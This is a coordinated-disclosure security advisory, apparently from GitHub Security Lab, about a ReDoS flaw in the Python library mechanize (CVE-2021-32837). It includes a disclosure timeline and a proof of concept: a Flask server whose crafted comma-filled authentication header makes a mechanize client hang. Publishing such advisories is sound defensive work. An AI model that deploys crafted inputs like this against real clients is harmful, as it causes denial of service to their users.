iframe-proxy | Sunbelt Computer Software

Coordinated Disclosure Timeline

2021-08-31: Created issue asking for contact details.
2021-08-31: They added a security policy and closed the issue. I sent the report to kovid@kovidgoyal.net
2021-08-31: Issue is fixed by @kovidgoyal.
2021-08-31: Emailed kovid@kovidgoyal.net to ask if there will a new release of mechanize and whether there will be an advisory.
2021-09-01: Reply from kovid@kovidgoyal.net: “New version released”

Summary

mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

mechanize

Tested Version

v0.4.5

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the query on mechanize here.

Vulnerability

The vulnerable regular expression is here.

mechanize is a library for automatically interacting with HTTP web servers. If the webserver responds in a malicious way, then mechanize could crash.

The reproduction steps below first start a webserver, and then starts mechanize. You can try to delete the resp.headers[... line to see how mechanize should behave.

Install mechanize and flask: pip3 install mechanize flask
Run the server below with python3:

from flask import Flask, make_response
app = Flask(__name__)

@app.route("/")
def home():
    resp = make_response("401 Unauthorized")
    resp.status_code = 401
    resp.headers["www-authenticate"] = ",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"
    return resp

if __name__ == "__main__":
    app.run(debug=True, port=8080)

Leave the above server running while doing the next steps.
Run the below with python3:

import mechanize 

br = mechanize.Browser()
br.add_password("http://localhost:8080", "admin", "password")
br.open("http://localhost:8080")

Impact

This issue may lead to a denial of service.

CVE

CVE-2021-32837

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-108 in any communication regarding this issue.

Sunbelt Computer Software

PL/B Language Development and Support

GHSL-2021-108: ReDoS (Regular Expression Denial of Service) in mechanize - CVE-2021-32837